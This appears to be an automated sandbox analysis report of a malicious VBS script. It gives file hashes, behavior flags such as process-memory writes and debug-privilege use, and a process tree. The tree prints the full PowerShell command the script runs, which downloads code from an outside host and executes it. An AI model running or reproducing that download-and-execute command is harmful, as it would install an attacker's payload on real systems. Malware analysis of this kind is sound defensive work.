cb65d95a1496fd2e5105954eb3046df90c4262f19fa7d7d77fa59b488348b040

Analysis

max time kernel
118s
max time network
132s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27-03-2024 02:40

Target

cb65d95a1496fd2e5105954eb3046df90c4262f19fa7d7d77fa59b488348b040.vbs
Size

6KB
MD5

2a4b987fdbd42a6a5cfbfdc334ce634f
SHA1

9964d7287bb64f36231b751eb80608176fc8b687
SHA256

cb65d95a1496fd2e5105954eb3046df90c4262f19fa7d7d77fa59b488348b040
SHA512

4aabaf92a6bf309869ee2ab6eabb9081bb4b5fc57362d9b343fdc7e8eb010ef66512aa5e80056cdb9501f0602d413d325ccc81f1cff3ebe7756167d163d09b80
SSDEEP

192:QMg119gkCtL3IqSPN3QzGNzUoNK9V4nN9:Ly19gR3IquNgzG2oN7r

Score

1^/10

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1504	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1504	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2980 wrote to memory of 1504	2980	WScript.exe	28
PID 2980 wrote to memory of 1504	2980	WScript.exe	28
PID 2980 wrote to memory of 1504	2980	WScript.exe	28

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cb65d95a1496fd2e5105954eb3046df90c4262f19fa7d7d77fa59b488348b040.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'backupitfirst.com/rudxfiyb')
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1504

memory/1504-4-0x000000001B270000-0x000000001B552000-memory.dmp

Filesize
2.9MB

Download
memory/1504-5-0x0000000002490000-0x0000000002498000-memory.dmp

Filesize
32KB

Download
memory/1504-6-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp

Filesize
9.6MB

Download
memory/1504-7-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/1504-8-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp

Filesize
9.6MB

Download
memory/1504-9-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/1504-10-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/1504-11-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp

Filesize
9.6MB

Download